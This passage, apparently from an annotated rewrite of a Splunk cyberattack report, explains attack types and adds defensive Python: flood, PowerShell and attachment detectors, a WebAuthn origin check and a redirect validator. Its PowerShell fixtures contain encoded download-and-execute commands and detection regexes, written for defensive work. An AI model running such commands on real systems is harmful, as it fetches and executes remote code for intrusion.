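Of the flood types listed above, a SYN flood has the clearest measurable symptom: many connection openings toward one service, from many sources, that are never completed with the client’s final handshake ACK, so the server accumulates half-open connections. The following added example, which is not code from Splunk’s report, computes that half-open ratio per service from a constructed ingress packet log; the log format, addresses and thresholds are assumptions.

```python
"""Detect SYN-flood symptoms in an ingress packet log.

Added example, not Splunk's code. The constructed log has one line per
packet arriving at the protected servers, "ts src dst dport flags", where
flags is S for a client SYN and A for the client's handshake-completing ACK.
A flood shows up as many SYNs toward one service from many sources with
almost no completed handshakes (half-open connections).
"""
from collections import defaultdict

# Constructed: two legitimate clients that complete their handshakes.
BENIGN_PACKETS = """\
1700000000.00 10.0.0.5 192.0.2.10 443 S
1700000000.02 10.0.0.5 192.0.2.10 443 A
1700000000.50 10.0.0.6 192.0.2.10 443 S
1700000000.52 10.0.0.6 192.0.2.10 443 A
"""

# Constructed: the same service then receives 40 single-SYN sources that
# never follow up, the pattern spoofed flood traffic produces.
FLOOD_PACKETS = BENIGN_PACKETS + "".join(
    f"1700000001.{i:02d} 198.51.100.{i} 192.0.2.10 443 S\n" for i in range(40))


def handshake_stats(text):
    """Per (dst, dport): distinct SYN sources, how many of them completed the
    handshake, and the resulting half-open ratio."""
    syn_sources = defaultdict(set)
    ack_sources = defaultdict(set)
    for line in text.strip().splitlines():
        _, src, dst, dport, flags = line.split()
        key = (dst, int(dport))
        if flags == "S":
            syn_sources[key].add(src)
        elif flags == "A":
            ack_sources[key].add(src)
    stats = {}
    for key, sources in syn_sources.items():
        completed = len(sources & ack_sources[key])
        stats[key] = {
            "syns": len(sources),
            "completed": completed,
            "half_open_ratio": 1 - completed / len(sources),
        }
    return stats


def syn_flood_targets(text, min_syns=30, min_half_open=0.8):
    """Services whose SYN source count and half-open ratio both exceed the
    thresholds (assumed values; tune to the service's normal connection rate)."""
    return {f"{dst}:{port}": s
            for (dst, port), s in handshake_stats(text).items()
            if s["syns"] >= min_syns and s["half_open_ratio"] >= min_half_open}


if __name__ == "__main__":
    print("benign:", syn_flood_targets(BENIGN_PACKETS))
    print("flood: ", syn_flood_targets(FLOOD_PACKETS))
```

The same statistic is what SYN cookies and connection-rate limits on the server or upstream device react to; computing it from packet captures or flow logs lets an operator confirm which service is under pressure before changing those settings.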


Drive-by Download Attack

In January 2020, visitors to the legendary zine and blog site Boing Boing saw a fake Google Play Protect overlay prompting them to download what was actually a malicious APK that installed a banking Trojan on Android devices. For Windows users, it appeared as a (fake) Adobe Flash installation page that distributed other malicious programs. Boing Boing’s content management system had been hacked. Even if the visitor didn’t take the bait, the drive-by downloads were automatically initiated by JavaScript embedded into the page. While Boing Boing was able to detect the attack and remove the script relatively quickly, given the site’s five million unique users — former President Barack Obama among them — the impact could have been disastrous.

What you need to know:
A drive-by download refers to the unintentional download of malicious code onto a computer or mobile device that exposes users to different types of threats. Cybercriminals use drive-by downloads to steal and collect personal information, inject banking Trojans or introduce exploit kits or other malware to user devices. To be protected against drive-by downloads, regularly update or patch systems with the latest versions of apps, software, browsers and operating systems. It’s also recommended to stay away from insecure or potentially malicious websites.

How the attack happens:
What makes drive-by downloads different is that users do not need to click on anything to initiate the download. Simply accessing or browsing a website can activate the download. The malicious code is designed to download malicious files onto the victim’s device without the user’s knowledge. A drive-by download abuses insecure, vulnerable or outdated apps, browsers or even operating systems.

Where the attack comes from:
The rise of prepackaged drive-by download kits allows hackers of any skill level to launch these kinds of attacks. In fact, these kits can be purchased and deployed without the hacker writing their own code or establishing their own infrastructure for data exfiltration or other abuses. The ease with which these attacks can be executed means that they can come from virtually anywhere.


Insider Threat
Revenge. It’s a tale as old as time. In 2022, an IT specialist was charged for allegedly hacking the server of a Chicago healthcare
organization. He’d had access to the server because he’d been a contractor, and he had motive. He’d been denied a job at
the organization, and a few months later, he was fired by the contracting IT firm. This act of individual retaliation resulted in a
cyberattack that dramatically disrupted medical examinations, treatments and diagnoses for many patients.

Insider Threat

What you need to know:
An insider threat attack is a malicious assault carried out by insiders with authorized access to an organization’s computer system, network and resources. In this assault, attackers often aim to steal classified, proprietary or otherwise sensitive information and assets, either for personal gain or to provide information to competitors. They might also try to sabotage your organization with system disruptions that mean loss of productivity, profitability and reputation.

How the attack happens:
Malicious insiders have a distinct advantage in that they already have authorized access to an organization’s network, information and assets. They may have accounts that give them access to critical systems or data, making it easy for them to locate it, circumvent security controls and send it outside of the organization.

Where the attack comes from:
Inside attackers can be employees in the organization with bad intentions or cyberspies impersonating contractors, third parties or remote workers. They may work autonomously, or as part of nation states, crime rings or competing organizations. While they might also be remote third-party suppliers or contractors located all over the world, they usually have some level of legitimate access to the organization’s systems and data.

IoT Threats
After a data leak exposed the personal information of over 3,000 users of Ring, a home security provider owned by Amazon,
hackers took advantage of the leak and hijacked video doorbells and smart cameras in people’s homes. In a 2020 class
action lawsuit, dozens of people say they were subjected to harassment, threats and blackmail through their Ring devices.
Researchers say these documented attacks are just the tip of the iceberg, since Ring sold more than 1.4 million video
doorbells in 2020 alone. Ring has since introduced end-to-end video encryption to help protect against future hacks, but
with the increasing ubiquity of IoT devices, this won’t be the last of these kinds of attacks.

IoT Threats

What you need to know:
There are an estimated 13.1 billion connected IoT devices globally — a number that is projected to increase to 30 billion by 2030. These devices often lack security infrastructure, creating glaring vulnerabilities in the network that exponentially grow the attack surface and leave it susceptible to malware. Attacks delivered over IoT devices can include DDoS, ransomware and social engineering threats.

How the attack happens:
Hackers and malicious nation states can exploit vulnerabilities in connected IoT devices with sophisticated malware to gain access to a network so they can monitor users or steal intellectual property, classified or personally identifying data and other critical information. Once they infiltrate an IoT system, hackers can also use their newly gained access for lateral movement to other connected devices or to gain entry to a greater network for various malicious purposes.

Where the attack comes from:
Attacks can come from anywhere in the world. But because many verticals such as government, manufacturing and healthcare are deploying IoT infrastructure without proper security protections, these systems are targets for attacks by hostile nation states and sophisticated cybercrime organizations. Unlike attacks against technology infrastructure, attacks against connected civic or healthcare systems could lead to widespread disruption, panic and human endangerment.

IoMT Threats
The prevalence and complexity of attacks on healthcare organizations — as well as the risk to patient confidentiality and safety — mean providers are coming under fire when it comes to medical device security. Due to attacks such as the WannaCry ransomware attack, lawmakers have outlined the severity of cybersecurity issues plaguing legacy software and equipment. The FDA has also issued updated guidance for device manufacturers, but companies aren’t required to follow these guidelines since they’re not legal mandates.

IoMT Threats

What you need to know:
The Internet of Medical Things (IoMT) has transformed healthcare as we know it, especially in the era of COVID-19. Leveraging IoMT has the power to unleash countless opportunities in diagnosing, treating and managing a patient’s health and wellness, and holds the key to lowering cost while improving quality of care. But as the number of connected devices invariably grows, so does the cybersecurity risk. As of 2020, more than 25% of cyberattacks in healthcare delivery organizations involve IoMT.

How the attack happens:
Because digital technologies age faster than their physical counterparts — which typically have a long product life cycle — outdated equipment and software are creating serious cybersecurity vulnerabilities for both hospitals and patients. Currently, manufacturers don’t allow customers to troubleshoot and patch their own devices, and will even go so far as to void warranties if they do. Compounded with lack of encryption, hardcoded credentials and lax security controls, there’s little that healthcare organizations can do to mitigate risk where legacy devices are involved.

Where the attack comes from:
IoMT attackers have the ability and resources to pinpoint healthcare providers with ambiguous security ownership, as well as poor asset or inventory visibility, and out-of-date systems and devices.

Macro Viruses
One of the most infamous virus incidents of all time, the Melissa virus of the late ’90s, was none other than a macro virus. A Melissa-infected PC would hijack the user’s Microsoft Outlook email system and send virus-laden messages to the first 50 addresses in their mailing lists. The virus propagated at an incredible speed, and caused astounding damage worldwide: an estimated $80 million for cleaning and repairing affected systems and networks. Though the heyday of the macro virus may have passed, these attacks continue, and they’re not just targeting Microsoft Windows anymore: recent attacks have targeted Mac users as well.

Macro Viruses

What you need to know:
A macro virus is a computer virus written in the same macro language that is used for software applications. Some applications, like Microsoft Office, Excel and PowerPoint, allow macro programs to be embedded in documents such that the macros are run automatically when the document is opened, and this provides a distinct mechanism by which malicious computer instructions can spread. This is one reason it can be dangerous to open unexpected attachments in emails, or emails from unrecognized senders. Many antivirus programs can detect macro viruses; however, the macro virus’s behavior can still be difficult to detect.

How the attack happens:
Macro viruses are often spread through phishing emails containing attachments that have been embedded with the virus. Because the email looks like it came from a credible source, many recipients open it. Once an infected macro is executed, it can jump to every other document on the user’s computer and infect them. Macro viruses spread whenever a user opens or closes an infected document. They run on applications and not on operating systems. The most common methods of spreading macro viruses are sharing files on a disk or network and opening a file attached to an email.

Where the attack comes from:
While macro viruses have fallen out of vogue for malicious attacks — primarily because antivirus software is better able to detect and disable them — they still represent a major threat. A cursory Google search for “macro virus” yields instructions for creating macro viruses and tools that assist non-coders in creating these viruses. In theory, anyone with internet access can create a macro virus with ease.

Malicious PowerShell
Attack sequences that exploit the ever-popular PowerShell are broadly attractive to top cybercriminals and cyberespionage groups because they make it easy to propagate viruses across a network. Notorious bad actors such as APT29 (aka Cozy Bear) use PowerShell scripts to gather critical intelligence to inform even more sophisticated cyberattacks. In 2020, the notorious threat group APT35 (aka “Charming Kitten”) abused PowerShell in a ransomware attack on a charity organization and to harvest and exfiltrate data from a U.S. local government.

Malicious PowerShell

What you need to know:
PowerShell is a command-line and scripting tool developed by Microsoft and built on .NET (pronounced “dot net”), that allows administrators and users to change system settings as well as to automate tasks. The command-line interface (CLI) offers a range of tools and flexibility, making it a popular shell and scripting language. Bad actors have also recognized the perks of PowerShell — namely, how to operate undetected on a system as a code endpoint, performing actions behind the scenes.

How the attack happens:
Since PowerShell is a scripting language that runs on the majority of enterprise machines — and since most companies don’t monitor code endpoints — the logic behind this type of attack is abundantly clear. It’s easy to gain access, and even easier for attackers to take root in the system. Malware doesn’t need to be installed in order to run or execute the malicious script. This means the hacker can effortlessly bypass detection — circumventing the analysis of executable files to wreak havoc at their leisure.

Where the attack comes from:
This type of attack is more sophisticated than other methods, and is usually executed by a power hacker who knows exactly what they’re doing (versus an amateur who might resort to brute force attacks). Ever stealthy in their approach, they’re adept at covering their tracks, and know how to move laterally across a network.
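The point of the passage is that in-memory PowerShell leaves no file for antivirus to scan, so the practical countermeasure is to log and inspect the script text itself (Script Block Logging, event ID 4104, and process-creation command lines, event ID 4688 or Sysmon event 1). The following is an added example written for this page, not code from the Splunk report: it runs a few detection heuristics over constructed records of that shape, decoding -EncodedCommand payloads (base64 of UTF-16LE) and flagging download-and-execute patterns, hidden windows and execution-policy bypass flags. The record field names, the sample script text and the TEST-NET addresses in it are constructed for the example.

```python
import base64
import re

# Constructed records modelled on Script Block Logging (4104) and process-creation
# command lines (4688 / Sysmon 1). Field names are simplified for this example.
SAMPLE_RECORDS = [
    {"id": "1", "source": "4104",
     "text": "Get-ChildItem C:\\data | Compress-Archive -DestinationPath D:\\backup.zip"},
    {"id": "2", "source": "4688",
     "text": "powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand "
             + base64.b64encode(
                 "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
                 .encode("utf-16-le")).decode()},
    {"id": "3", "source": "4104",
     "text": "Invoke-Expression (Invoke-WebRequest -Uri http://203.0.113.5/x).Content"},
]

# PowerShell accepts -EncodedCommand and its abbreviations; the payload is base64 of UTF-16LE text.
ENCODED_RE = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Each indicator alone is common in legitimate administration; combinations are what matter.
INDICATORS = {
    "download_cradle": re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
    "dynamic_eval": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I),
    "policy_bypass": re.compile(r"-Exec(?:utionPolicy)?\s+Bypass", re.I),
    "no_profile": re.compile(r"-NoP(?:rofile)?\b", re.I),
}


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_record(record):
    """List the indicators that fire in the visible text or in the decoded payload."""
    text = record["text"]
    decoded = decode_encoded_command(text)
    visible = ENCODED_RE.sub("", text)  # do not pattern-match inside the base64 blob itself
    hits = ["encoded_command"] if decoded is not None else []
    for name, rx in INDICATORS.items():
        if rx.search(visible) or (decoded is not None and rx.search(decoded)):
            hits.append(name)
    return {"id": record["id"], "source": record["source"], "hits": hits, "decoded": decoded}


def suspicious_records(records, min_hits=2):
    """Records with at least min_hits indicators; a single hit is routine in admin scripts."""
    return [r for r in map(analyze_record, records) if len(r["hits"]) >= min_hits]


if __name__ == "__main__":
    for r in suspicious_records(SAMPLE_RECORDS):
        print(r["id"], r["source"], r["hits"], r["decoded"])
```

The decoded payload is kept in the result so an analyst sees what the obfuscated command actually did rather than only a flag name. Script Block Logging has to be enabled through policy before 4104 events exist at all, which is the monitoring gap the passage describes.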

Man-in-the-Middle Attack
In early 2022, Microsoft discovered a phishing campaign targeting Office365 users. The attackers spoofed a phony 365 login page, gathering credentials for later abuse and misuse. To do this, the attackers used an Evilginx2 phishing kit — a man-in-the-middle (MITM) attack framework used for phishing login credentials along with session cookies, allowing bad actors to bypass two-factor authentication — in order to hijack the authentication process. Microsoft added in its blog post, “Note that this is not a vulnerability in MFA; since AiTM phishing steals the session cookie, the attacker gets authenticated to a session on the user’s behalf, regardless of the sign-in method the latter uses.”

Man-in-the-Middle Attack

What you need to know:
The MITM attack, also known as adversary-in-the-middle (AiTM), sets up a proxy server that intercepts the victim’s log-in session, so that the malicious actor can act as a relay between the two parties or systems — thereby gaining access to and/or pilfering sensitive information. This type of attack allows a malicious actor to intercept, send and receive data intended for somebody else — or that’s not meant to be sent at all — without either outside party knowing, until it is too late.

How the attack happens:
Virtually anyone could execute a man-in-the-middle attack. Since the implementation of HTTPS Everywhere, however, these kinds of attacks are more difficult to execute, and are therefore more rare. In an MITM attack, the hacker sits between the user and the real website (or other user) and passes the data between them, exfiltrating whatever data they like from the interaction.

Where the attack comes from:
Because improvements in security technologies have made MITM attacks more difficult to execute, the only groups attempting them are sophisticated hackers or state actors. In 2018, the Dutch police found four members of the Russian hacking group Fancy Bear parked outside of the Organization for the Prohibition of Chemical Weapons in Holland, attempting an MITM infiltration to steal employee credentials. Later that year, the U.S. and UK governments released warnings that Russian state-sponsored actors were actively targeting routers in homes and enterprises for the purpose of MITM exfiltration.
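The Microsoft quote above explains why a one-time code does not stop an AiTM proxy: the proxy relays the whole login and keeps the resulting session cookie. The defence a practitioner reaches for is an authenticator whose response is bound to the origin the browser is actually connected to, as in FIDO2/WebAuthn: the browser writes the page origin into clientDataJSON, the authenticator signs authenticatorData followed by SHA-256(clientDataJSON), and the relying party rejects any assertion whose origin is not its own. The block below is an added illustration written for this page, not Microsoft’s or the report’s code, and it simplifies the protocol in two labelled ways: an HMAC with a shared secret stands in for the authenticator’s asymmetric signature so the example runs on the standard library alone, and the RP ID is taken to be the origin’s host. The origins and the lookalike proxy host are constructed.

```python
import base64
import hashlib
import hmac
import json
import secrets

RP_ORIGIN = "https://login.example.com"  # constructed relying-party origin


def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def rp_id_hash(origin):
    # Simplification for the example: the RP ID is the origin's host.
    return hashlib.sha256(origin.split("//", 1)[1].encode()).digest()


def authenticator_assert(secret, challenge, origin):
    """Browser + authenticator side. The browser fills in the origin it is talking to;
    the page and the user cannot change it. HMAC stands in for the signature."""
    client_data = json.dumps({"type": "webauthn.get", "challenge": challenge, "origin": origin},
                             separators=(",", ":")).encode()
    auth_data = rp_id_hash(origin) + b"\x01" + (0).to_bytes(4, "big")  # flags: UP set, counter 0
    signed = auth_data + hashlib.sha256(client_data).digest()
    sig = hmac.new(secret, signed, "sha256").digest()
    return {"clientDataJSON": b64url(client_data),
            "authenticatorData": b64url(auth_data),
            "signature": b64url(sig)}


def verify_assertion(secret, assertion, expected_challenge, expected_origin=RP_ORIGIN):
    """Relying-party side, in the order the WebAuthn spec checks things."""
    client_data = b64url_decode(assertion["clientDataJSON"])
    auth_data = b64url_decode(assertion["authenticatorData"])
    sig = b64url_decode(assertion["signature"])
    cd = json.loads(client_data)
    if cd.get("type") != "webauthn.get":
        return False, "wrong type"
    if not hmac.compare_digest(str(cd.get("challenge", "")), expected_challenge):
        return False, "challenge mismatch"
    if cd.get("origin") != expected_origin:
        return False, "origin mismatch"          # this is what defeats the proxy
    if auth_data[:32] != rp_id_hash(expected_origin):
        return False, "rpIdHash mismatch"
    expected_sig = hmac.new(secret, auth_data + hashlib.sha256(client_data).digest(), "sha256").digest()
    if not hmac.compare_digest(sig, expected_sig):
        return False, "bad signature"            # origin was rewritten after signing
    return True, "ok"


def demo():
    """Direct login succeeds; a relayed assertion fails on origin; a proxy that edits the
    origin and rpIdHash to match fails on the signature, which covers both."""
    secret = secrets.token_bytes(32)                      # constructed credential secret
    challenge = b64url(secrets.token_bytes(32))
    direct = authenticator_assert(secret, challenge, RP_ORIGIN)
    phished = authenticator_assert(secret, challenge, "https://login-example.com")  # constructed lookalike
    cd = json.loads(b64url_decode(phished["clientDataJSON"]))
    cd["origin"] = RP_ORIGIN
    forged = dict(phished,
                  clientDataJSON=b64url(json.dumps(cd, separators=(",", ":")).encode()),
                  authenticatorData=b64url(rp_id_hash(RP_ORIGIN) + b64url_decode(phished["authenticatorData"])[32:]))
    return (verify_assertion(secret, direct, challenge)[0],
            verify_assertion(secret, phished, challenge)[1],
            verify_assertion(secret, forged, challenge)[1])


if __name__ == "__main__":
    print(demo())
```

The contrast with the cookie theft in the quote is that nothing the proxy receives can be replayed against the real origin: the assertion it relays names the wrong origin, and rewriting the origin invalidates the signature. A session cookie issued after a password-plus-OTP login carries no such binding, which is why the proxy keeps it.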

Masquerade Attack
Many of us still remember when Target experienced
a massive credit card breach affecting over forty million
customer accounts. The states’ investigation into the breach revealed that attackers stole the credentials of Target’s
HVAC contractor, Fazio Mechanical Services. After using the third-party vendor’s details to get into Target’s internal web
application, they installed malware on the system and captured names, phone numbers, payment card numbers, credit
card verification codes and other highly sensitive information.

Masquerade Attack

What you need to know:
A masquerade attack happens when a bad actor uses a forged or legitimate (but stolen) identity to gain unauthorized access to someone’s machine or an organization’s network via legitimate access identification. Depending on the level of access the permissions provide, masquerade attacks could give attackers access to an entire network.

How the attack happens:
A masquerade attack can happen after users’ credentials are stolen, or through authenticating on unguarded machines and devices which have access to the target network.

Where the attack comes from:
From an insider angle, attackers can get access by spoofing login domains or using keyloggers to steal legitimate authentication credentials. The attacks can also happen physically by taking advantage of targets who leave machines unguarded — like a coworker accessing someone’s laptop while they’re away. Generally speaking, weak authentication methods that can be duped by external parties are usually the source of the problem.

Meltdown and Spectre Attack
Most cybersecurity attacks exploit a vulnerability, such as a coding mistake or bad design. But not all attacks are created equal. In 2018, two Google researchers discovered a new type of attack that affected all computer chip makers and potentially exposed billions to the Meltdown and Spectre attack.

Meltdown and Spectre Attack

What you need to know:
The Meltdown and Spectre attack exploits vulnerabilities in computer processors. These vulnerabilities allow attackers to steal almost any data that is being processed on the computer. This is an attack that strikes at the core of computer security, which relies on the isolation of memory to protect a user’s information. A “meltdown” refers to the breakdown of any protective barrier between an operating system and a program, while “spectre” indicates the breakdown between two applications that keep information from each other.

How the attack happens:
A Meltdown and Spectre attack exploits critical vulnerabilities in modern CPUs that allow unintended access to data in memory storage. The attack breaks the norm of computing where programs are not allowed to read data from other programs. The types of information attackers typically target are passwords stored in a password manager or browser as well as emails, financial records and personal information such as photos and instant messages. But this attack is not limited to personal computers. It can target almost any device with a processor, such as a mobile phone or tablet.

Where the attack comes from:
The Spectre and Meltdown attack can originate from nearly anywhere, and much of the research thus far has focused on this attack’s unique nature instead of who’s behind it.

Network Sniffing
Smart locks are a new type of device intended to protect your home and make it easier to enter with the click (or, more appropriately, tap) of a button. But taking a more futuristic approach to fortifying your house can have serious consequences, security researchers have found. One smart lock, not-so-aptly marketed as the “smartest lock ever,” could be intercepted via network traffic between the mobile app and the lock itself. Scarier yet, this can be done through inexpensive, readily available network-sniffing devices.

Network Sniffing

What you need to know:
Network sniffing, also known as packet sniffing, is the real-time capturing, monitoring and analysis of data flowing within a network. Whether it’s via hardware, software or a combination of both, bad actors use sniffing tools to eavesdrop on unencrypted data from network packets, such as credentials, emails, passwords, messages and other sensitive information.

How the attack happens:
Much like wiretapping scenarios in which someone listens in on phone calls for sensitive details, network sniffing works in the background, silently listening in as information is exchanged between entities on a network. This happens when attackers place a sniffer on a network via the installation of software or hardware plugged into a device that allows it to intercept and log traffic over the wired or wireless network the host device has access to. Due to the complexity inherent in most networks, sniffers can sit on the network for a long time before being detected.

Where the attack comes from:
Network sniffing is often conducted legally by organizations like ISPs, advertising agencies, government agencies and others who need to verify network traffic. But it can also be launched by hackers doing it for the “lulz” or nation-states looking to pilfer intellectual property. Like ransomware, network sniffers can be injected into the network by getting the right person to click on the right link. Insider threats with access to sensitive hardware could also be a vector for attack.

Open Redirection
In 2022, yet another phishing campaign targeting Facebook users was discovered to
have netted hundreds of millions of credentials. The technique used was a common
one: A link is sent via DM from a compromised Facebook account, then that link performs a series of redirects, often
through malvertising pages to rack up views and clicks (and revenue for the attacker), ultimately landing on a fake page.
Though the technique of host redirection, also known as open redirect, isn’t new, the sheer scale of this campaign is
remarkable. Researchers found that just one phishing landing page out of around 400 had 2.7 million visitors in 2021, and
8.5 by June of 2022. In an interview with researchers, the attacker boasted of making $150 for every thousand visits from
U.S. Facebook users, which would put the bad actor’s total earnings at $59 million.

Open Redirection

What you need to know:
Host redirection attacks are very common and increasingly subversive, as hackers become more creative about how they lure their targets. Attackers use URL redirection to gain a user’s trust before they inevitably strike. They’ll typically use embedded URLs, an .htaccess file or employ phishing tactics in order to redirect traffic to a malicious website.

How the attack happens:
The hacker might send a phishing email that includes a copycat of the website’s URL to the unsuspecting victim. If the website appears legitimate, users might inadvertently share personal information by filling out any prompts or forms that appear. Attackers can take this to the next level by embedding faux command-and-control domains in malware, and hosting malicious content on domains that closely mimic corporate servers.

Where the attack comes from:
The origins of this attack are not as important as the target. This attack is usually aimed at unsophisticated internet users who won’t notice that the URL of their favorite domain is a letter or two off. And because this attack prides itself on simplicity (it can be as easy as registering a domain name), it can originate from almost anywhere.
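The campaign described above lends a trusted domain’s name to a chain of redirects; a site whose redirect endpoint forwards visitors wherever a query parameter says is the application-side half of that problem, and it is one a developer can close. The block below is an added example written for this page, not code from the Splunk report: the vulnerable handler that trusts a next parameter sits beside a hardened one that accepts only a local path or an https URL to an allowlisted host, and the checks cover the inputs that usually slip past naive validation (scheme-relative //host, backslashes and control characters, userinfo before an @, non-https schemes). The hostnames in the allowlist are constructed.

```python
from urllib.parse import urlsplit, urlunsplit

ALLOWED_HOSTS = {"www.example.com", "accounts.example.com"}  # constructed allowlist


def unsafe_redirect_target(next_url):
    """Vulnerable form: the user lands wherever the ?next= parameter points."""
    return next_url


def safe_redirect_target(next_url, fallback="/"):
    """Hardened form: accept only a local absolute path or an https URL to an allowlisted host.

    Anything that fails a check falls back to a fixed safe location instead of being 'cleaned',
    because browsers and URL parsers disagree on how to read odd input."""
    # Backslashes and control characters are normalised differently by browsers; refuse them outright.
    if not next_url or any(c in next_url for c in "\\\r\n\t"):
        return fallback
    parts = urlsplit(next_url)
    if not parts.scheme and not parts.netloc:
        # Local path: exactly one leading slash. '//host' is scheme-relative and must be refused.
        return next_url if next_url.startswith("/") and not next_url.startswith("//") else fallback
    if parts.scheme.lower() != "https":
        return fallback
    try:
        # 'https://www.example.com@evil.example/' has an allowlisted-looking userinfo but a different host.
        if parts.username is not None or parts.password is not None or parts.port is not None:
            return fallback
    except ValueError:  # malformed port
        return fallback
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        return fallback
    # Rebuild the URL from the validated parts rather than echoing the raw input.
    return urlunsplit(("https", host, parts.path or "/", parts.query, parts.fragment))


if __name__ == "__main__":
    for candidate in ["/account/settings", "//evil.example/", "/\\evil.example",
                      "https://www.example.com@evil.example/", "https://WWW.example.com/settings?x=1",
                      "http://www.example.com/", "javascript:alert(1)"]:
        print(repr(candidate), "->", unsafe_redirect_target(candidate), "|", safe_redirect_target(candidate))
```

Rebuilding the URL from validated parts is deliberate: a handler that validates and then echoes the original string can still be tricked by an encoding the parser and the browser interpret differently. Where an application only ever redirects within itself, dropping the absolute-URL branch and allowing just local paths is simpler still.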

Pass the Hash
The infamous breach of over 40 million Target customer accounts was successful partly due to the well-known attack technique called pass the hash (PtH). The hackers used PtH to gain access to an NT hash token that would allow them to log in to the Active Directory administrator’s account without the plaintext password — thereby giving them the necessary privileges to create a new domain admin account, later adding it to the Domain Admins group. This root in the system gave them the opportunity to steal personal information and payment card details from Target’s customers.

Pass the Hash

What you need to know:
Pass the hash allows an attacker to authenticate as a user with the underlying NTLM or LanMan hash instead of the associated plaintext password. Once the hacker has a valid username along with the password’s hash values, they can get into the user’s account without issue, and perform actions on local or remote systems. Essentially, hashes replace the original passwords that they were generated from.

How the attack happens:
On systems using NTLM authentication, a user’s password or passphrase is never submitted in cleartext. Instead, it’s sent as a hash in response to a challenge-response authentication scheme. When this happens, valid password hashes for the account being used are captured using a credential access technique.

Where the attack comes from:
This type of attack is more sophisticated than other methods, and is usually executed by highly organized, motivated threat groups with their sights set on a specific organization or person, and with a mind to political or financial gain.

Phishing
When it comes to phishing attacks, there are a few that stand out above
the rest — like the now-infamous attack on Sony’s network. Hackers executed
the attack by sending phishing emails requesting verification for Apple IDs to system
engineers, network administrators and other unsuspecting employees with system credentials. The attackers absconded with
gigabytes worth of files, which included emails, financial reports and digital copies of recently released films. On top of that, the
malicious actors then infused Sony’s workstation computers with malware that erased the machines’ hard drives. A few weeks
later, the FBI formally pointed to the North Korean government as the masterminds behind the attack.

Phishing

What you need to know:
A phishing attack tricks everyday consumers, users or employees into clicking on a malicious link, often driving them to a bogus site to provide personally identifiable information such as banking account numbers, credit card information or passwords, delivered via email, direct message or other communication. Be wary — while these bogus sites may look convincing, attackers will harvest any information you submit to them. Or they may launch malware aimed at stealing funds from your accounts, personally identifiable customer information or other critical assets.

How the attack happens:
Typically you’ll be lured by an email impersonating someone you know — a message that appears to be from a manager or coworker, for example — compelling you to open malicious attachments or click links that lead you to webpages practically identical to legitimate sites.

Where the attack comes from:
Just a few decades ago, a large number of phishing attacks were sourced to Nigeria in what were known as 419 scams, due to their fraud designation in the Nigerian criminal code. Today, phishing attacks originate from all over the world, with many occurring in BRIC countries (Brazil, Russia, India and China), according to the InfoSec Institute. Because of the ease and availability of phishing toolkits, even hackers with minimal technical skills can launch phishing campaigns. The people behind these campaigns run the gamut from individual hackers to organized cybercriminals.

Phishing

Phishing Payloads
One of the biggest cybercrimes ever — with the highest number of defendants charged for the same crime — was what the
FBI called Operation Phish Phry. The attack sparked a multinational phishing investigation after targeting hundreds of bank
and credit card customers, all of whom received emails with links to fake, but authentic-looking, financial websites. On the
site, targets were asked to enter their account numbers and passwords into fraudulent forms.

Phishing Payloads

What you need to know:
Despite its simplicity, phishing remains the most pervasive and dangerous cyberthreat. In fact, research shows that as many as 91% of all successful attacks are initiated via a phishing email. These emails use fraudulent domains, email scraping techniques, familiar contact names inserted as senders, and other tactics to lure targets into clicking a malicious link, opening an attachment with a nefarious payload, or entering sensitive personal information that perpetrators may intercept. The “payload” refers to the transmitted data that is the intended message. Headers and metadata are only sent to enable the delivery of the payload to the correct person.

How the attack happens:
This attack has a typical attack pattern: first, the attacker sends a phishing email and the recipient downloads the attached file, which is typically a .docx or .zip file with an embedded .lnk file. Second, the .lnk file executes a PowerShell script, and lastly the PowerShell script executes a reverse shell, rendering the exploit successful.

Where the attack comes from:
Because this attack doesn’t require a high level of sophistication, and because phishing is at the center of most cyberattacks, it can originate from anywhere in the world. Operation Phish Phry is a perfect example of this. In this attack, the FBI arrested more than 50 people in California, Nevada, and North Carolina, while also charging about 50 Egyptian nationals in connection with the attack.
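The attachment is the first link in the chain this passage describes (a .zip or .docx carrying a .lnk), and it is also where the Macro Viruses section’s payload lives, since an Office document is itself a zip archive and a VBA project inside it is stored as a vbaProject.bin member. Both can be inspected at the mail gateway before a user ever opens the file. The block below is an added example serving both sections, written for this page and not taken from the Splunk report: it builds three small archives in memory, a clean document, a document named .docx that nevertheless contains a VBA project, and a zip carrying a shortcut with a double extension, then lists what a scanner should flag in each. The file names, member names and the risky-extension list are constructed for the example.

```python
import io
import zipfile

# Extensions that run code when double-clicked on Windows; a constructed, non-exhaustive list.
RISKY_EXTENSIONS = {".lnk", ".exe", ".js", ".vbs", ".hta", ".scr", ".ps1", ".bat", ".cmd"}
# Where Office (OOXML) documents keep an embedded VBA project, in lower case for comparison.
MACRO_PARTS = {"word/vbaproject.bin", "xl/vbaproject.bin", "ppt/vbaproject.bin"}
# These extensions promise a macro-free document, so a VBA part inside one is itself a signal.
MACRO_FREE_EXTENSIONS = {".docx", ".xlsx", ".pptx"}


def scan_attachment(filename, data):
    """Return a list of (finding, detail) tuples for one attachment; [] means nothing flagged.
    Only zip-based containers (OOXML documents, .zip archives) are inspected here."""
    findings = []
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return findings
    ext = "." + filename.lower().rsplit(".", 1)[-1] if "." in filename else ""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            lower = name.lower()
            if lower in MACRO_PARTS:
                findings.append(("macro", name))
                if ext in MACRO_FREE_EXTENSIONS:
                    findings.append(("macro_in_macro_free_extension", filename))
            base = lower.rsplit("/", 1)[-1]
            parts = base.split(".")
            if len(parts) > 1 and "." + parts[-1] in RISKY_EXTENSIONS:
                findings.append(("risky_member", name))
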